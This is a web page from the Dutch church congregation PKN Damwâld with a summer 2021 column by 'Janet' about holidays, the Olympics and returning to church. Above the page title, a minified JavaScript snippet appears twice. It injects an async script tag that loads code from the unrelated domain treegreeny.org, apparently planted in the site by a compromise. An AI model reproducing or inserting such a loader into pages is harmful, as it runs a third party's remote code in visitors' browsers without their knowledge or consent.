;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Zomer - PKN Damwâld

Zomer

Gepubliceerd op: vrijdag 13 augustus 2021

Het is hartje zomer, de vakantieperiode is net over de helft. Hopelijk voor de meesten van ons een moment om even rust te nemen, te kunnen genieten van familie, vrienden en vrije tijd. Voor ons deze keer geen verre reis, maar een paar korte tripjes in Nederland. Bewust, omdat alles rond corona nog steeds heel onzeker en wisselvallig is, en ik geen zin heb om dagelijks het nieuws te moeten volgen of we wel of niet mogen uitreizen/inreizen, een test moeten ondergaan of toch in quarantaine. Ons land is mooi, en zeker per auto is het nog overzichtelijk waar je wel en niet aan moet voldoen. Verder benutten we de tijd voor klussen in en om huis, ‘s avonds een avond vuurtje stoken in de buitenkachel (zwaar favoriet!) en het lezen van een boek of het kijken van een film of serie. De Olympische Spelen zijn net weer voorbij, een mooi spektakel om te volgen en wat een mooie en bijzondere prestaties en verhalen komen er dan voorbij! Het is mooi om te horen wat mensen beweegt (letterlijk) en welke route ze hebben afgelegd om zo ver te komen. Maar ook verhalen van samen optrekken, elkaar inspireren en aanmoedigen en samen de prijs behalen (of delen).

Ik hoop dat we na de zomer elkaar weer mogen ontmoeten in de kerk. Voor het luisteren naar Gods woord, het mogen zingen en spelen, bidden en lezen. Maar ook om onze belevenissen te kunnen delen, naar elkaar te luisteren, in gesprek te gaan. Elkaar te inspireren, te stimuleren, te helpen. Bij de kerkelijke taken en klussen die voor ons liggen, maar ook het zoeken van God(s boodschap) voor, in, en met elkaar. Heel benieuwd ben ik, wat het nieuwe seizoen voor ons in petto heeft. Welke nieuwe predikant op ons pad komt, hoe we samen weer vormgeven aan het kerk-zijn en welke uitdagingen we mogelijk het hoofd moeten bieden. Maar één ding weet ik zeker: God is erbij. Of we nu op vakantie zijn en genieten van rust en vrijheid, of wanneer de plicht weer roept en we ons storten op werk en kerk: Hij is erbij, en Hij wil ons helpen. Hoe dan ook, waar dan ook. Het enige wat we hoeven te doen is, het Hem  te vragen. Daarom wens ik jullie toe: Vaya con Dios (ga met God). Fijne zomer!

Columnist:Janet

Leer mij kennen
Uitgelezen?

Gelukkig hebben wij meer columns!

Bekijk al onze columns